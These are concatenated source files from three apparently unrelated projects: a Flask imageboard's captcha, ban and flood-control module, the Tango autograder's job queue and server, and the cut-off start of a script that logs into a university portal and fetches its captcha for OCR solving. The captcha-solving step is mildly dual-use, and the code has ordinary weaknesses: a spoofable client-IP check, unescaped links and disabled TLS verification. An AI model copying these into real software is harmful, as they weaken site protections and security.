p[3] = p[3].replace(r, rep)
if re.compile(r'>>[\d]').search(p[3]):
p[3] = re.sub(r'>>([\d\,]+)([\s]?)<',
r'<a href="#\1">>>\1</a><',
p[3])
p = postt.format(*p)
threadp.append(p)
tinfo["messages"] = "".join(threadp)
tinfo["title"] = meta[0]
if lock:
tinfo["title"] = "🔒 " + tinfo["title"]
# threadp.insert(0, f"<h1>{meta[0]}</h1>")
# threadp[0] += "source: "
if host != "local":
tinfo["source"] += "🌎"
tinfo["source"] += "<a href='/threads/{0}/'>{0}</a>".format(host)
thread = threadt.format(tinfo["title"], tinfo["source"], tinfo["tags"],
tinfo["messages"])
if host == "sageru":
thread = u.bees + thread
return thread
@viewer.route('/threads/<host>/<thread>/', methods=['POST', 'GET'])
def reply_t(host, thread):
now = str(int(time.time()))
if request.method == 'POST':
if request.form['sub'] == "Reply":
author = request.form["author"] or "Anonymous"
message = request.form["message"]
if not message:
return "please write a message"
if not whitelist.approve():
return "please solve <a href='/captcha'>the captcha</a>"
tpath = "/".join(["./threads", host, thread, "local.txt"])
flood = whitelist.flood(s.post)
if flood: return flood
writer.rep_t(host, thread, now, author, message)
writer.update_host(host, thread, now)
redir = f"/threads/{host}/{thread}"
return f"<center><h1><a href='{redir}'>View updated thread</a></h1></center>"
tpage = view_t(host, thread)
canpost = whitelist.approve()
lock = 0
if os.path.isfile(f"./threads/{host}/{thread}/lock"):
lock = 1
if not canpost:
replf = whitelist.show_captcha(1, f"/threads/{host}/{thread}/")
elif lock:
replf = "<hr> <div> 🔒 Thread has been locked. No more comments are allowed.</div>"
else:
replf = newr.format(host, thread)
tpage += replf
return p.mk(str(tpage))
```
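The `>>` quote-linking near the end of `view_t` is easiest to see on a small string. A standalone sketch of just the final regex step (the sample text is invented):
```python
import re

# ">>12" (or ">>3,1") becomes an in-page anchor, but only when the reference is
# immediately followed by a tag boundary such as <br>
body = "I agree<br>>>12<br>also see >>3,1<br>"
linked = re.sub(r'>>([\d\,]+)([\s]?)<',
                r'<a href="#\1">>>\1</a><',
                body)
print(linked)
# I agree<br><a href="#12">>>12</a><br>also see <a href="#3,1">>>3,1</a><br>
```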
#### File: 153/multichan/whitelist.py
```python
import json
import os
import random
import string
import time
import settings as s
import pagemaker as p
from captcha.image import ImageCaptcha
from flask import Blueprint
from flask import request
whitelist = Blueprint("whitelist", __name__)
image = ImageCaptcha(fonts=['droid.ttf'])
conf = s.wlist
klen = 5
tnow = int(time.time())
def get_ip():
return request.headers.get('X-Forwarded-For', request.remote_addr)
def randstr(length):
letters = "bcefgkmopswxz"
key = "".join(list(random.choice(letters) for i in range(length)))
return key
def ldlog():
with open(conf, "r") as log:
log = log.read().splitlines()
log = [i.split(" ") for i in log]
log = {i[1] : i for i in log}
return log
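# The whitelist file (s.wlist) read above is assumed to hold one space-separated
# line per visitor: "<issued_ts> <ip> <captcha_key>", with a fourth "<solved_ts>"
# field appended by approve() once the captcha is solved; entries with four
# fields are treated as already approved on later requests.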
def genkey(ip):
entry = [str(int(time.time())), ip, str(randstr(klen))]
image.write(entry[2], f'./static/cap/{ip}.png')
return entry
def addlog(ip, ig=0):
log = ldlog()
if ip not in log or ig:
entry = genkey(ip)
log[ip] = entry
fi = "\n".join([" ".join(log[x]) for x in log])
with open(conf, "w") as iplog:
iplog.write(fi)
return log
def approve(ip=0, key=""):
if not ip:
ip = get_ip()
now = str(int(time.time()))
log = ldlog()
with open(s.bans, "r") as bans:
bans = bans.read().splitlines()
    bans = [b.split(" ")[0] if " " in b else b for b in bans]
iprange = ".".join(ip.split(".")[:3])
if ip in bans or iprange in bans:
return False
if ip in log:
if len(log[ip]) == 3:
if log[ip][2] != key:
return False
log[ip].append(now)
newl = [" ".join(log[k]) for k in log]
with open(conf, "w") as log:
log.write("\n".join(newl))
return True
else:
return True
return False
@whitelist.route('/captcha/')
def show_captcha(hide=0, redir=''):
ip = get_ip()
mylog = addlog(ip)
logtxt = json.dumps(mylog)
out = ""
if not hide:
out = p.html("captcha")
out += p.html("captcha-form").format(mylog[ip][1], redir)
if hide:
return out
return p.mk(out)
@whitelist.route('/captcha/refresh')
def refresh():
ip = get_ip()
mylog = addlog(ip, 1)
return "<meta http-equiv='refresh' content='0;URL=/captcha'>"
@whitelist.route('/captcha/check', methods=['POST', 'GET'])
def check(redir=""):
key = request.args.get('key').lower()
ip = get_ip()
log = ldlog()
out = approve(ip, key)
out = json.dumps(out)
if out == "false":
out = "You have filled the captcha incorrectly."
out += "<p>Please <a href='/captcha'>solve the captcha.</a>"
if out == "true":
out = "You filled out the captcha correctly!"
out += "<p>Please <a href='/rules'>review the rules</a> before posting."
out += f"<hr><a href='{redir}'>back</a>"
if os.path.isfile(f"./static/cap/{ip}.png"):
os.remove(f"./static/cap/{ip}.png")
return out
def flood(limit=60, mode="comment"):
ip = get_ip()
tnow = str(int(time.time()))
with open(s.log, "r") as log:
log = log.read().splitlines()
try: log = [x.split() for x in log]
except: return False
log = [x for x in log if x[3] == ip]
if mode == "comment":
if not log: return False
try: post = log[-1][3:5]
except: return False
post[1] = post[1].split("<>")[0]
last = post
elif mode == "thread":
try: threads = [x for x in log if (x[0] == "local") and (x[2] == "1")]
except: return False
if not threads: return False
thread = threads[-1][3:5]
thread[1] = thread[1].split("<>")[0]
last = thread
pause = int(tnow) - int(last[1])
diff = limit - pause
if diff > 60:
diff = f"{diff//60} minutes {diff %60}"
if pause < limit:
return "<b>Error: flood detected.</b>" \
+ f"<p>Please wait {diff} seconds before trying to post again."
return False
``` |
{
"source": "15-411/Tango",
"score": 3
} |
#### File: 15-411/Tango/jobQueue.py
```python
import threading, logging, time
from datetime import datetime
from collections import defaultdict
from tangoObjects import TangoDictionary, TangoJob, TangoIntValue, WrappingDictionary
from config import Config
#
# JobQueue - This class defines the job queue and the functions for
# manipulating it. The actual queue is made up of two smaller
# sub-lists:
#
# - The active list is a dictionary, keyed off job ID, that holds all
# jobs that are active, including those not yet assigned to a worker
# thread. The trace attribute of a job being None indicates that
# the job is not yet assigned. Only the JobManager thread can
# assign jobs to Workers.
#
# - The dead list is a dictionary of the jobs that have completed.
#
class JobQueue:
def __init__(self, preallocator):
# Create two dictionaries that, for each job currently in the dictionary, also maintains a mapping
# from output file to the job. This allows easy, constant-time lookup for job based on output file.
self.liveJobs = WrappingDictionary("liveJobsWrapped", TangoDictionary("liveJobs"), lambda j: j.outputFile)
self.deadJobs = WrappingDictionary("deadJobsWrapped", TangoDictionary("deadJobs"), lambda j: j.outputFile)
self.queueLock = threading.Lock()
self.preallocator = preallocator
self.log = logging.getLogger("JobQueue")
self.nextID = 1
self.max_pool_size = TangoIntValue("max_pool_size", -1)
if (hasattr(Config, 'MAX_POOL_SIZE') and
Config.MAX_POOL_SIZE >= 0):
self.max_pool_size.set(Config.MAX_POOL_SIZE)
def _getNextID(self):
"""_getNextID - updates and returns the next ID to be used for a job
Jobs have ID's between 1 and MAX_JOBID.
"""
self.log.debug("_getNextID|Acquiring lock to job queue.")
with self.queueLock:
self.log.debug("_getNextID|Acquired lock to job queue.")
id = self.nextID
# If a job already exists in the queue at nextID, then try to find
# an empty ID. If the queue is full, then return -1.
keys = self.liveJobs.keys()
if (str(id) in keys):
id = -1
for i in xrange(1, Config.MAX_JOBID + 1):
if (str(i) not in keys):
id = i
break
self.nextID += 1
if self.nextID > Config.MAX_JOBID:
self.nextID = 1
self.log.debug("_getNextID|Released lock to job queue.")
return id
def add(self, job):
"""add - add job to live queue
This function assigns an ID number to a job and then adds it
to the queue of live jobs.
"""
if (not isinstance(job, TangoJob)):
return -1
self.log.debug("add|Getting next ID")
job.setId(self._getNextID())
if (job.id == -1):
self.log.info("add|JobQueue is full")
return -1
self.log.debug("add|Gotten next ID: " + str(job.id))
self.log.info("add|Unassigning job ID: %d" % (job.id))
job.makeUnassigned()
job.retries = 0
# Add the job to the queue. Careful not to append the trace until we
# know the job has actually been added to the queue.
self.log.debug("add|Acquiring lock to job queue.")
with self.queueLock:
self.log.debug("add| Acquired lock to job queue.")
self.liveJobs.set(job.id, job)
job.appendTrace("Added job %s:%d to queue" % (job.name, job.id))
self.log.debug("Ref: " + str(job._remoteLocation))
self.log.debug("job_id: " + str(job.id))
self.log.debug("job_name: " + str(job.name))
self.log.debug("add|Releasing lock to job queue.")
self.log.info("Added job %s:%d to queue, details = %s" %
(job.name, job.id, str(job.__dict__)))
return str(job.id)
def addDead(self, job):
""" addDead - add a job to the dead queue.
Called by validateJob when a job validation fails.
"""
if (not isinstance(job, TangoJob)):
return -1
job.setId(self._getNextID())
self.log.info("addDead|Unassigning job %s" % str(job.id))
job.makeUnassigned()
job.retries = 0
self.log.debug("addDead|Acquiring lock to job queue.")
with self.queueLock:
self.log.debug("addDead|Acquired lock to job queue.")
self.deadJobs.set(job.id, job)
self.log.debug("addDead|Released lock to job queue.")
return job.id
def remove(self, id):
"""remove - Remove job from live queue
"""
status = -1
self.log.debug("remove|Acquiring lock to job queue.")
with self.queueLock:
self.log.debug("remove|Acquired lock to job queue.")
if str(id) in self.liveJobs.keys():
self.liveJobs.delete(id)
status = 0
self.log.debug("remove|Relased lock to job queue.")
if status == 0:
self.log.debug("Removed job %s from queue" % id)
else:
self.log.error("Job %s not found in queue" % id)
return status
class JobStatus:
NOT_FOUND = 0
WAITING = 1
RUNNING = 2
DEAD = 3
def findRemovingWaiting(self, outputFile):
""" findRemovingWaiting - find the job with the given output file.
If the found job is live but unrun ("waiting"), move it from the live
queue to the dead queue. Always return the status of the found job.
"""
self.log.debug("findRemovingWaiting|Acquiring lock to job queue.")
with self.queueLock:
self.log.debug("findRemovingWaiting|Acquired lock to job queue.")
liveJobResult = self.liveJobs.getWrapped(outputFile)
deadJobResult = self.deadJobs.getWrapped(outputFile)
if liveJobResult:
(id, job) = liveJobResult
status = JobQueue.JobStatus.WAITING if job.isNotAssigned() else JobQueue.JobStatus.RUNNING
elif deadJobResult:
(id, job) = deadJobResult
status = JobQueue.JobStatus.DEAD
else:
(id, job) = (None, None)
status = JobQueue.JobStatus.NOT_FOUND
if status == JobQueue.JobStatus.WAITING:
                self.makeDeadUnsafe(id, "Requested by findRemovingWaiting")
            self.log.debug("findRemovingWaiting|Released lock to job queue.")
return id, job, status
def delJob(self, id, deadjob):
""" delJob - Implements delJob() interface call
@param id - The id of the job to remove
@param deadjob - If 0, move the job from the live queue to the
dead queue. If non-zero, remove the job from the dead queue
and discard.
"""
if deadjob == 0:
return self.makeDead(id, "Requested by operator")
else:
status = -1
self.log.debug("delJob| Acquiring lock to job queue.")
with self.queueLock:
self.log.debug("delJob| Acquired lock to job queue.")
if str(id) in self.deadJobs.keys():
self.deadJobs.delete(id)
status = 0
self.log.debug("delJob| Released lock to job queue.")
if status == 0:
self.log.debug("Removed job %s from dead queue" % id)
else:
self.log.error("Job %s not found in dead queue" % id)
return status
def isLive(self, id):
self.log.debug("isLive| Acquiring lock to job queue.")
with self.queueLock:
self.log.debug("isLive| Acquired lock to job queue.")
isLive = self.liveJobs.get(id)
self.log.debug("isLive| Released lock to job queue.")
return isLive
def get(self, id):
"""get - retrieve job from live queue
@param id - the id of the job to retrieve
"""
self.log.debug("get| Acquiring lock to job queue.")
with self.queueLock:
self.log.debug("get| Acquired lock to job queue.")
if str(id) in self.liveJobs.keys():
job = self.liveJobs.get(id)
else:
job = None
self.log.debug("get| Released lock to job queue.")
return job
def getNextPendingJob(self):
"""getNextPendingJob - Returns ID of next pending job from queue.
Called by JobManager when Config.REUSE_VMS==False
"""
with self.queueLock:
limitingKeys = defaultdict(int)
for id, job in self.liveJobs.iteritems():
if not job.isNotAssigned():
limitingKeys[job.limitingKey] += 1
max_concurrent = 0
if hasattr(Config, 'MAX_CONCURRENT_JOBS') and Config.MAX_CONCURRENT_JOBS:
max_concurrent = Config.MAX_CONCURRENT_JOBS
for id, job in self.liveJobs.iteritems():
if job.isNotAssigned() and (max_concurrent <= 0 or limitingKeys[job.limitingKey] < max_concurrent):
return id
return None
# Create or enlarge a pool if there is no free vm to use and
# the limit for pool is not reached yet
def incrementPoolSizeIfNecessary(self, job):
max_ps = self.max_pool_size.get()
if self.preallocator.freePoolSize(job.vm.name) == 0 and \
self.preallocator.poolSize(job.vm.name) < max_ps:
increment = 1
if hasattr(Config, 'POOL_ALLOC_INCREMENT') and Config.POOL_ALLOC_INCREMENT:
increment = Config.POOL_ALLOC_INCREMENT
self.preallocator.incrementPoolSize(job.vm, increment)
def getNextPendingJobReuse(self, target_id=None):
"""getNextPendingJobReuse - Returns ID of next pending job and its VM.
Called by JobManager when Config.REUSE_VMS==True
"""
self.log.debug("getNextPendingJobReuse| Acquiring lock to job queue.")
with self.queueLock:
self.log.debug("getNextPendingJobReuse| Acquired lock to job queue.")
limitingKeys = defaultdict(int)
for id, job in self.liveJobs.iteritems():
if not job.isNotAssigned():
limitingKeys[job.limitingKey] += 1
self.log.debug("getNextPendingJobReuse| Done checking limitingKeys")
max_concurrent = 0
if hasattr(Config, 'MAX_CONCURRENT_JOBS') and Config.MAX_CONCURRENT_JOBS:
max_concurrent = Config.MAX_CONCURRENT_JOBS
for id, job in self.liveJobs.iteritems():
# if target_id is set, only interested in this id
if target_id and target_id != id:
continue
# If the job hasn't been assigned to a worker yet, see if there
# is a free VM
if job.isNotAssigned() and (max_concurrent <= 0 or limitingKeys[job.limitingKey] < max_concurrent):
self.log.debug("getNextPendingJobReuse| Incrementing poolsize if necessary")
self.incrementPoolSizeIfNecessary(job)
self.log.debug("getNextPendingJobReuse| Done incrementing poolsize if necessary")
self.log.debug("getNextPendingJobReuse| Allocating vm")
vm = self.preallocator.allocVM(job.vm.name)
self.log.debug("getNextPendingJobReuse| Done allocating vm")
if vm:
self.log.info("getNextPendingJobReuse alloc vm %s to job %s" % (vm, id))
self.log.debug("getNextPendingJobReuse| Released lock to job queue.")
return (id, vm)
self.log.debug("getNextPendingJobReuse| Released lock to job queue.")
return (None, None)
# Returns the number of jobs that are ready to be assigned to a VM.
# NOTE: the client must manually obtain the queueLock before calling this.
def numReadyJobsUnsafe(self):
count = 0
max_concurrent = 0
if hasattr(Config, 'MAX_CONCURRENT_JOBS') and Config.MAX_CONCURRENT_JOBS:
max_concurrent = Config.MAX_CONCURRENT_JOBS
limitingKeys = defaultdict(int)
for id, job in self.liveJobs.iteritems():
if not job.isNotAssigned():
limitingKeys[job.limitingKey] += 1
for id, job in self.liveJobs.iteritems():
if job.isNotAssigned() and (max_concurrent <= 0 or limitingKeys[job.limitingKey] < max_concurrent):
count += 1
return count
def assignJob(self, jobId):
""" assignJob - marks a job to be assigned
"""
self.log.debug("assignJob| Acquiring lock to job queue.")
with self.queueLock:
self.log.debug("assignJob| Acquired lock to job queue.")
job = self.liveJobs.get(jobId)
self.log.debug("assignJob| Retrieved job.")
self.log.info("assignJob|Assigning job ID: %s" % str(job.id))
job.makeAssigned()
self.log.debug("assignJob| Released lock to job queue.")
def unassignJob(self, jobId):
""" assignJob - marks a job to be unassigned
"""
self.log.debug("unassignJob| Acquiring lock to job queue.")
with self.queueLock:
self.log.debug("unassignJob| Acquired lock to job queue.")
job = self.liveJobs.get(jobId)
if job.retries is None:
job.retries = 0
else:
job.retries += 1
Config.job_retries += 1
self.log.info("unassignJob|Unassigning job %s" % str(job.id))
job.makeUnassigned()
self.log.debug("unassignJob| Released lock to job queue.")
def makeDead(self, id, reason):
""" makeDead - move a job from live queue to dead queue
"""
self.log.info("makeDead| Making dead job ID: " + str(id) + " " + reason)
self.log.debug("makeDead| Acquiring lock to job queue.")
with self.queueLock:
self.log.debug("makeDead| Acquired lock to job queue.")
status = self.makeDeadUnsafe(id, reason)
self.log.debug("makeDead| Released lock to job queue.")
return status
# Thread unsafe version of makeDead that acquires no locks.
def makeDeadUnsafe(self, id, reason):
status = -1
if str(id) in self.liveJobs.keys():
self.log.info("makeDead| Found job ID: %d in the live queue" % (id))
status = 0
job = self.liveJobs.get(id)
self.log.info("Terminated job %s:%d: %s" %
(job.name, job.id, reason))
self.deadJobs.set(id, job)
self.liveJobs.delete(id)
job.appendTrace(reason)
return status
def getInfo(self):
info = {}
info['size'] = len(self.liveJobs.keys())
info['size_deadjobs'] = len(self.deadJobs.keys())
return info
def reset(self):
self.liveJobs._clean()
self.deadJobs._clean()
```
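The header comment of `jobQueue.py` describes the live/dead split; below is a minimal sketch of how a caller drives it, assuming a `Preallocator` and a fully populated `TangoJob` are built the same way the rest of this repo does (constructor arguments are omitted here and would be required in practice):
```python
from jobQueue import JobQueue
from preallocator import Preallocator
from tangoObjects import TangoJob

queue = JobQueue(Preallocator({}))   # the preallocator normally wraps a VMMS dict

job = TangoJob()                     # real jobs also set name, vm, input, outputFile, ...
job_id = queue.add(job)              # returns the new id, or -1 if the queue is full

pending = queue.getNextPendingJob()  # next unassigned job, honoring MAX_CONCURRENT_JOBS
if pending is not None:
    queue.assignJob(pending)         # mark it assigned so other workers skip it
    # ... run the job ...
    queue.makeDead(pending, "finished")   # move it from the live list to the dead list
```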
#### File: 15-411/Tango/tango.py
```python
import threading, logging, time, stat, re, os
from datetime import datetime
from preallocator import Preallocator
from jobQueue import JobQueue
from jobManager import JobManager
import requests
import threading
from tangoObjects import TangoJob
from config import Config
class CancellationStatus:
SUCCEEDED = 0
NOT_FOUND = 1
FAILED = 2
ALREADY_COMPLETED = 3
class TangoServer:
""" TangoServer - Implements the API functions that the server accepts
"""
def __init__(self):
self.daemon = True
# init logging early, or some logging will be lost
logging.basicConfig(
filename=Config.LOGFILE,
format="%(levelname)s|%(asctime)s|%(name)s|%(message)s",
level=Config.LOGLEVEL,
)
vmms = None
if Config.VMMS_NAME == "tashiSSH":
from vmms.tashiSSH import TashiSSH
vmms = TashiSSH()
elif Config.VMMS_NAME == "ec2SSH":
from vmms.ec2SSH import Ec2SSH
vmms = Ec2SSH()
elif Config.VMMS_NAME == "localDocker":
from vmms.localDocker import LocalDocker
vmms = LocalDocker()
elif Config.VMMS_NAME == "distDocker":
from vmms.distDocker import DistDocker
vmms = DistDocker()
self.preallocator = Preallocator({Config.VMMS_NAME: vmms})
self.jobQueue = JobQueue(self.preallocator)
if not Config.USE_REDIS:
# creates a local Job Manager if there is no persistent
# memory between processes. Otherwise, JobManager will
# be initiated separately
JobManager(self.jobQueue).start()
self.start_time = time.time()
self.log = logging.getLogger("TangoServer")
self.log.info("Starting Tango server")
def addJob(self, job):
""" addJob - Add a job to the job queue
"""
Config.job_requests += 1
self.log.debug("Received addJob request")
ret = self.__validateJob(job, self.preallocator.vmms)
self.log.info("Done validating job %s" % (job.name))
if ret == 0:
return self.jobQueue.add(job)
else:
self.jobQueue.addDead(job)
return -1
def delJob(self, id, deadjob):
""" delJob - Delete a job
@param id: Id of job to delete
@param deadjob - If 0, move the job from the live queue to the
dead queue. If non-zero, remove the job from the dead queue
and discard. Use with caution!
"""
self.log.debug("Received delJob(%d, %d) request" % (id, deadjob))
return self.jobQueue.delJob(id, deadjob)
def cancelJobWithPath(self, outFilePath):
""" cancelJobWithPath - when this function returns, one of the following
is true:
1. The job with the specified output file does not exist
2. the job with the specified output file has finished running normally
3. The job with the specified output file has been cancelled
4. The job was found, and it's running, but cancellation failed.
In case 1, NOT_FOUND is returned.
2, ALREADY_COMPLETED is returned.
3, SUCCEEDED is returned.
4, FAILED is returned.
"""
self.log.debug("Received cancelJobWithPath(%s) request" % (outFilePath))
id, job, job_status = self.jobQueue.findRemovingWaiting(outFilePath)
self.log.debug("cancelJobWithPath: Found a job %s with status %s" %
(job, job_status))
if job_status == JobQueue.JobStatus.NOT_FOUND:
return CancellationStatus.NOT_FOUND
elif job_status == JobQueue.JobStatus.DEAD:
return CancellationStatus.ALREADY_COMPLETED
elif job_status == JobQueue.JobStatus.RUNNING:
return self.killUntilJobComplete(id, job)
else:
assert job_status == JobQueue.JobStatus.WAITING
# In this case, findRemovingLive has moved the live job to the dead
# queue, and we have nothing to worry about.
# Let's notify autolab that the job is done.
if job.notifyURL:
outputFileName = job.outputFile.split("/")[-1] # get filename from path
files = {'file': unicode('Job was cancelled before it started.')}
hdrs = {'Filename': outputFileName}
self.log.debug("Sending request to %s" % job.notifyURL)
def worker():
requests.post(
job.notifyURL,
files=files,
headers=hdrs,
data = { 'runningTimeSeconds': 0 },
verify=False)
threading.Thread(target=worker).start()
return CancellationStatus.SUCCEEDED
def killUntilJobComplete(self, id, job):
""" Here's the contract:
If the job is currently running (i.e. it could complete at some point
in the future), then this method will return only when the job is
complete. It tries to help by repeatedly `pkill`ing the process. But
a compliant implementation could just block until the job completes
on its own.
On success, returns SUCCEEDED;
on failure, return FAILED (compliant w above method)
"""
self.log.debug("Received killUntilJobComplete request")
vm = job.vm
for _ in xrange(0, Config.CANCEL_RETRIES):
# Returns 0 on success.
if self.preallocator.vmms[vm.vmms].kill(vm) == 0:
return CancellationStatus.SUCCEEDED
return CancellationStatus.FAILED
def getJobs(self, item):
""" getJobs - Return the list of live jobs (item == 0) or the
list of dead jobs (item == -1).
^ You gotta be kidding me. Is this an API for number lovers.
"""
try:
self.log.debug("Received getJobs(%s) request" % (item))
if item == -1: # return the list of dead jobs
return self.jobQueue.deadJobs.values()
elif item == 0: # return the list of live jobs
return self.jobQueue.liveJobs.values()
else: # invalid parameter
return []
except Exception as e:
self.log.debug("getJobs: %s" % str(e))
def preallocVM(self, vm, num):
""" preallocVM - Set the pool size for VMs of type vm to num
"""
self.log.debug("Received preallocVM(%s,%d)request"
% (vm.name, num))
try:
vmms = self.preallocator.vmms[vm.vmms]
if not vm or num < 0:
return -2
if not vmms.isValidImage(vm.image):
self.log.error("Invalid image name")
return -3
(name, ext) = os.path.splitext(vm.image)
vm.name = name
self.preallocator.update(vm, num)
return 0
except Exception as err:
self.log.error("preallocVM failed: %s" % err)
return -1
def getVMs(self, vmms_name):
""" getVMs - return the list of VMs managed by the service vmms_name
"""
self.log.debug("Received getVMs request(%s)" % vmms_name)
try:
if vmms_name in self.preallocator.vmms:
vmms_inst = self.preallocator.vmms[vmms_name]
return vmms_inst.getVMs()
else:
return []
except Exception as err:
self.log.error("getVMs request failed: %s" % err)
return []
def delVM(self, vmName, id):
""" delVM - delete a specific VM instance from a pool
"""
self.log.debug("Received delVM request(%s, %d)" % (vmName, id))
try:
if not vmName or vmName == "" or not id:
return -1
return self.preallocator.destroyVM(vmName, id)
except Exception as err:
self.log.error("delVM request failed: %s" % err)
return -1
def getPool(self, vmName):
""" getPool - Return the current members of a pool and its free list
"""
self.log.debug("Received getPool request(%s)" % (vmName))
try:
if not vmName or vmName == "":
return []
result = self.preallocator.getPool(vmName)
return ["pool_size=%d" % len(result["pool"]),
"free_size=%d" % len(result["free"]),
"pool=%s" % result["pool"],
"free=%s" % result["free"]]
except Exception as err:
self.log.error("getPool request failed: %s" % err)
return []
def getInfo(self):
""" getInfo - return various statistics about the Tango daemon
"""
stats = {}
stats['elapsed_secs'] = time.time() - self.start_time;
stats['job_requests'] = Config.job_requests
stats['job_retries'] = Config.job_retries
stats['waitvm_timeouts'] = Config.waitvm_timeouts
stats['runjob_timeouts'] = Config.runjob_timeouts
stats['copyin_errors'] = Config.copyin_errors
stats['runjob_errors'] = Config.runjob_errors
stats['copyout_errors'] = Config.copyout_errors
stats['num_threads'] = threading.activeCount()
return stats
def setScaleParams(self, low_water_mark, max_pool_size):
self.preallocator.low_water_mark.set(low_water_mark)
self.jobQueue.max_pool_size.set(max_pool_size)
return 0
def runningTimeForOutputFile(self, outputFile):
self.log.debug("Received runningTimeForOutputFile(%s)" % outputFile)
liveJobTuple = self.jobQueue.liveJobs.getWrapped(outputFile)
if liveJobTuple:
(_, liveJob) = liveJobTuple
self.log.debug(str(liveJob.startTime))
return liveJob.runningTime()
return None
#
# Helper functions
#
# NOTE: This function should be called by ONLY jobManager. The rest servers
# shouldn't call this function.
def resetTango(self, vmms):
""" resetTango - resets Tango to a clean predictable state and
ensures that it has a working virtualization environment. A side
effect is that also checks that each supported VMMS is actually
running.
"""
# There are two cases this function is called: 1. Tango has a fresh start.
# Then we want to destroy all instances in Tango's name space. 2. Job
# Manager is restarted after a previous crash. Then we want to destroy
# the "busy" instances prior to the crash and leave the "free" onces intact.
self.log.debug("Received resetTango request.")
try:
# For each supported VMM system, get the instances it knows about
# in the current Tango name space and kill those not in free pools.
for vmms_name in vmms:
vobj = vmms[vmms_name]
# Round up all instances in the free pools.
allFreeVMs = []
for key in self.preallocator.machines.keys():
freePool = self.preallocator.getPool(key)["free"]
for vmId in freePool:
vmName = vobj.instanceName(vmId, key)
allFreeVMs.append(vmName)
self.log.info("vms in all free pools: %s" % allFreeVMs)
            # For each VM in Tango's name space, destroy the ones not in a free pool
            # AND remove them from Tango's internal bookkeeping.
vms = vobj.getVMs()
self.log.debug("Pre-existing VMs: %s" % [vm.name for vm in vms])
destroyedList = []
removedList = []
for vm in vms:
if re.match("%s-" % Config.PREFIX, vm.name):
                    # Todo: should have a one-call interface to destroy the
                    # machine AND to keep the internal data consistent.
if vm.name not in allFreeVMs:
destroyedList.append(vm.name)
vobj.destroyVM(vm)
# also remove it from "total" set of the pool
(prefix, vmId, poolName) = vm.name.split("-")
machine = self.preallocator.machines.get(poolName)
if not machine: # the pool may not exist
continue
if int(vmId) in machine[0]:
removedList.append(vm.name)
machine[0].remove(int(vmId))
self.preallocator.machines.set(poolName, machine)
if destroyedList:
self.log.warning("Killed these %s VMs on restart: %s" %
(vmms_name, destroyedList))
if removedList:
self.log.warning("Removed these %s VMs from their pools" %
(removedList))
for _, job in self.jobQueue.liveJobs.iteritems():
if not job.isNotAssigned():
job.makeUnassigned()
self.log.debug("job: %s, assigned: %s" %
(str(job.name), str(job.assigned)))
except Exception as err:
self.log.error("resetTango: Call to VMMS %s failed: %s" %
(vmms_name, err))
os._exit(1)
def __validateJob(self, job, vmms):
""" validateJob - validate the input arguments in an addJob request.
"""
errors = 0
# If this isn't a Tango job then bail with an error
if (not isinstance(job, TangoJob)):
return -1
# Every job must have a name
if not job.name:
self.log.error("validateJob: Missing job.name")
job.appendTrace("validateJob: Missing job.name")
errors += 1
# Check the virtual machine field
if not job.vm:
self.log.error("validateJob: Missing job.vm")
job.appendTrace("validateJob: Missing job.vm")
errors += 1
else:
if not job.vm.image:
self.log.error("validateJob: Missing job.vm.image")
job.appendTrace("validateJob: Missing job.vm.image")
errors += 1
else:
vobj = vmms[Config.VMMS_NAME]
if not vobj.isValidImage(job.vm.image):
self.log.error("validateJob: Image not found: %s" % job.vm.image)
job.appendTrace("validateJob: Image not found: %s" % job.vm.image)
errors += 1
else:
(name, ext) = os.path.splitext(job.vm.image)
job.vm.name = name
if not job.vm.vmms:
self.log.error("validateJob: Missing job.vm.vmms")
job.appendTrace("validateJob: Missing job.vm.vmms")
errors += 1
else:
if job.vm.vmms not in vmms:
self.log.error("validateJob: Invalid vmms name: %s" % job.vm.vmms)
job.appendTrace("validateJob: Invalid vmms name: %s" % job.vm.vmms)
errors += 1
# Check the output file
if not job.outputFile:
self.log.error("validateJob: Missing job.outputFile")
job.appendTrace("validateJob: Missing job.outputFile")
errors += 1
else:
if not os.path.exists(os.path.dirname(job.outputFile)):
self.log.error("validateJob: Bad output path: %s" % job.outputFile)
job.appendTrace("validateJob: Bad output path: %s" % job.outputFile)
errors += 1
# Check for max output file size parameter
if not job.maxOutputFileSize:
self.log.debug("validateJob: Setting job.maxOutputFileSize "
"to default value: %d bytes", Config.MAX_OUTPUT_FILE_SIZE)
job.maxOutputFileSize = Config.MAX_OUTPUT_FILE_SIZE
# Check the list of input files
hasMakefile = False
for inputFile in job.input:
if not inputFile.localFile:
self.log.error("validateJob: Missing inputFile.localFile")
job.appendTrace("validateJob: Missing inputFile.localFile")
errors += 1
else:
if not os.path.exists(os.path.dirname(job.outputFile)):
self.log.error("validateJob: Bad output path: %s" % job.outputFile)
job.appendTrace("validateJob: Bad output path: %s" % job.outputFile)
errors += 1
if inputFile.destFile == 'Makefile':
hasMakefile = True
# Check if input files include a Makefile
if not hasMakefile:
self.log.error("validateJob: Missing Makefile in input files.")
job.appendTrace("validateJob: Missing Makefile in input files.")
errors+=1
# Check if job timeout has been set; If not set timeout to default
if not job.timeout or job.timeout <= 0:
self.log.debug("validateJob: Setting job.timeout to"
" default config value: %d secs", Config.RUNJOB_TIMEOUT)
job.timeout = Config.RUNJOB_TIMEOUT
# Any problems, return an error status
if errors > 0:
self.log.error("validateJob: Job rejected: %d errors" % errors)
job.appendTrace("validateJob: Job rejected: %d errors" % errors)
return -1
else:
return 0
``` |
{
"source": "154544017/homework_check_for_sep_course",
"score": 2
} |
#### File: 154544017/homework_check_for_sep_course/main.py
```python
import sys
from time import sleep
import ddddocr
import requests
from prettytable import PrettyTable
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
def get_driver(driver_path, headless=True):
if headless:
chrome_options = Options()
chrome_options.add_argument('--no-sandbox')
chrome_options.add_argument('--disable-dev-shm-usage')
chrome_options.add_argument('--disable-gpu')
chrome_options.add_argument('--headless')
chrome_options.add_experimental_option('w3c', False)
driver = webdriver.Chrome(executable_path=driver_path, options=chrome_options)
else:
driver = webdriver.Chrome(executable_path=driver_path)
# driver.implicitly_wait(10)
return driver
def get_check_code_image(driver, img_path):
check_code_url = 'http://sep.ucas.ac.cn/changePic'
headers = {
'Host': 'sep.ucas.ac.cn',
'Connection': 'keep-alive',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36',
'Accept': 'image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8',
'Referer': 'http://sep.ucas.ac.cn/',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9'
}
# set cookies
